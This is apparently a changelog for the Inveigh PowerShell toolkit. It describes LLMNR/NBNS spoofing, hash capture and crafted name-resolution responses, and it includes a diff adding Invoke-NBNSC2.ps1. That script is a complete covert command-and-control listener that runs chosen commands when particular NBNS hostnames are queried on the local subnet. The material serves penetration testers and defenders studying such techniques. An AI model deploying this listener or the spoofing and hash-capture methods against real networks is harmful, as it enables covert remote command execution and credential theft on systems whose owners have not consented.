Inveigh 1.21.2

1. Added Inveigh-Unprivileged.ps1 (replaces Inveigh-BruteForce.ps1) –
This script contains only LLMNR/NBNS spoofing and hash capture methods
that do not require local admin access. The NBNS spoofer can be used
without disabling the local NBNS service. The LLMNR spoofer does require
stopping (needs admin) the local service and freeing up port 5355. It
will work without admin on a system with LLMNR disabled. Note that there
can still be systems configurations that will prevent
Inveigh-Unprivileged from working, and require admin access to change
(e.g. local firewall blocking traffic, LLMNR enabled). This script
replaces Inveigh-BruteForce and contains the same functionality.

2. Inveigh.ps1 Updates - Added a learning mode (SpooferLearning
parameter) to Invoke-Inveigh that will attempt to avoid spoofing
requests for valid hostnames. If enabled, Inveigh will send out
LLMNR/NBNS requests for hostnames received through incoming LLMNR/NBNS
requests. If Inveigh receives a response for a sent requests, it will
add the hostname to a blacklist. Added some some code to help keep track
or the SMB capture sequence. Removed the ability to launch
Invoke-InveighRelay directly from an Invoke-Inveigh command line.

3. Inveigh-Relay.ps1 Status - This one is due for an overhhaul. I'm also
considering trying to convert it to not require admin access. No real
changes on this pass though. It will work with either Invoke-Inveigh
(-HTTP N and/or -HTTPS N) or Invoke-InveighUnprivileged (-HTTP N) as
long as the target system supports SMB1.

4. Support Functions - Merged all of the small Get functions into
Get-Inveigh.

5. Extras – Added an extras directory for functions that don’t fit the
main scripts.
a. Send-NBNSResponse – This function sends a crafted NBNS response
packet to a specific target. For name resolution to be successful, the
specified TargetIP, Hostname, and TransactionID must match a very (very
very) recent NBNS request. You must have an external method
(wireshark,etc) of viewing the required NBNS request fields for traffic
on the target subnet. The odds of pulling this attack off manually are
slim due to the narrow response window. I've only been able to get it to
work manually by watching tshark with the the transaction ID being
listed in the output. Ideally, this function would be fed by another
script.
b. Send-LLMNResponse – Just like Send-NBNSResponse but even harder to
use manually.
c. Invoke-NBNSC2 - Invoke-NBNSC2 will listen for NBNS requests and
execute set commands if requests for specific hostnames are received.
The function must be supplied with an even number of Hostnames and
Commands. NBNS requests can be sent from a NBNS enabled system on the
same subnet using ping, etc.

1 files changed, 151 insertions, 0 deletions

diff --git a/Extras/Invoke-NBNSC2.ps1 b/Extras/Invoke-NBNSC2.ps1
new file mode 100644
index 0000000..41d2e64
--- /dev/null
+++ b/Extras/Invoke-NBNSC2.ps1
@@ -0,0 +1,151 @@
+function Invoke-NBNSC2
+{
+<#
+.SYNOPSIS
+Invoke-NBNSC2 will listen for NBNS requests and execute set commands if requests for specific hostnames are
+received. The function must be supplied with an even number of Hostnames and Commands. NBNS requests can be
+sent from a NBNS enabled system on the same subnet using ping, etc.
+
+.PARAMETER Hostnames
+A comma separated list of Hostnames that will trigger a corresponding command. The first hostname trigger a command
+from the Commands array with a matching index (e.g. Hostnames[0] executes Commands[0]).
+
+.PARAMETER Commands
+An array of commands stored in scriptblock format. All commands must be enclosed in {} brackets.
+
+.PARAMETER ExitHostname
+Specify a hostname that will cause the function to exit. This hostname must not match a hostname used in Hostnames.
+
+.PARAMETER RunTime
+(Integer) Set the run time duration.
+
+.PARAMETER RunTimeUnit
+Default = Minutes: Set the time unit for RunTime to either Minutes, Hours, or Days.
+
+.EXAMPLE
+Send-NBNSC2 -Hostnames test1,test2 -Command {calc},{notepad} -RunTime 1 -RunTimeUnit Days
+
+.LINK
+https://github.com/Kevin-Robertson/Inveigh
+#>
+
+[CmdletBinding()]
+param
+(
+[parameter(Mandatory=$true)][Array]$Hostnames = "",
+[parameter(Mandatory=$true)][Array]$Commands = "",
+[parameter(Mandatory=$true)][String]$ExitHostname = "",
+[parameter(Mandatory=$false)][Int]$RunTime="",
+[parameter(Mandatory=$false)][ValidateSet("Minutes","Hours","Days")][String]$RunTimeUnit="Minutes",
+[parameter(ValueFromRemainingArguments=$true)]$invalid_parameter
+)
+
+if ($invalid_parameter)
+{
+    throw "$($invalid_parameter) is not a valid parameter."
+}
+
+if($Hostnames.Count -ne $Commands.Count)
+{
+    throw "Must use an equal number of Hostnames and Commands."
+}
+elseif($Hostnames -contains $ExitHostname)
+{
+    throw "ExitHostname cannot be used as in Hostnames."
+}
+
+if($RunTime)
+{   
+    if($RunTimeUnit -like 'Minutes')
+    {
+        $runtime_timeout = new-timespan -Minutes $RunTime
+    }
+    elseif($RunTimeUnit -like 'Hours')
+    {
+        $runtime_timeout = new-timespan -Hours $RunTime
+    }
+    elseif($RunTimeUnit -like 'Days')
+    {
+        $runtime_timeout = new-timespan -Days $RunTime
+    }
+
+    $runtime_stopwatch = [System.Diagnostics.Stopwatch]::StartNew()
+}
+
+$Hostnames = $Hostnames | % {$_.ToUpper()}
+$running = $true
+$NBNS_listener_endpoint = New-Object System.Net.IPEndPoint ([IPAddress]::Broadcast,137)
+$NBNS_UDP_client = New-Object System.Net.Sockets.UdpClient 137
+$NBNS_UDP_client.Client.ReceiveTimeout = 10000
+$control_timeout = new-timespan -Seconds 1
+$control_stopwatch = [System.Diagnostics.Stopwatch]::StartNew()
+
+while($running)
+{
+    try
+    {
+        $NBNS_request_data = $NBNS_UDP_client.Receive([Ref]$NBNS_listener_endpoint)
+    }
+    catch
+    {
+        $NBNS_request_data = $null
+    }
+
+    if($NBNS_request_data)
+    {
+        $NBNS_query = [System.BitConverter]::ToString($NBNS_request_data[13..($NBNS_request_data.Length - 4)])
+        $NBNS_query = $NBNS_query -replace "-00",""
+        $NBNS_query = $NBNS_query.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+        $NBNS_query_string_encoded = New-Object System.String ($NBNS_query,0,$NBNS_query.Length)
+        $NBNS_query_string_encoded = $NBNS_query_string_encoded.Substring(0,$NBNS_query_string_encoded.IndexOf("CA"))
+        $NBNS_query_string_subtracted = ""
+        $NBNS_query_string = ""
+        $n = 0
+                            
+        if($NBNS_query_string_encoded.Length -gt 1)
+        {
+            do
+            {
+                $NBNS_query_string_sub = (([Byte][Char]($NBNS_query_string_encoded.Substring($n,1))) - 65)
+                $NBNS_query_string_subtracted += ([System.Convert]::ToString($NBNS_query_string_sub,16))
+                $n += 1
+            }
+            until($n -gt ($NBNS_query_string_encoded.Length - 1))
+                   
+            $n = 0
+                    
+            do
+            {
+                $NBNS_query_string += ([Char]([System.Convert]::ToInt16($NBNS_query_string_subtracted.Substring($n,2),16)))
+                $n += 2
+            }
+            until($n -gt ($NBNS_query_string_subtracted.Length - 1) -or $NBNS_query_string.Length -eq 15)
+        }
+
+        if([Array]::IndexOf($Hostnames,$NBNS_query_string) -ge 0 -and $control_stopwatch.Elapsed -ge $control_timeout)
+        {
+            $NBNS_UDP_client.Close()
+            $command_index = [Array]::IndexOf($Hostnames,$NBNS_query_string)
+            $NBNS_query_string = ''
+            & $Commands[$command_index]
+            $control_timeout = new-timespan -Seconds 5
+            $control_stopwatch = [System.Diagnostics.Stopwatch]::StartNew()
+            $NBNS_UDP_client = New-Object System.Net.Sockets.UdpClient 137
+            $NBNS_UDP_client.Client.ReceiveTimeout = 10000
+        }
+        elseif($ExitHostname -like $NBNS_query_string)
+        {
+            $running = $false
+        }
+    }
+
+    if($RunTime -and $runtime_stopwatch.Elapsed -ge $runtime_timeout)
+    {
+        $running = $false
+    }
+
+}
+
+$NBNS_UDP_client.Close()
+
+}
\ No newline at end of file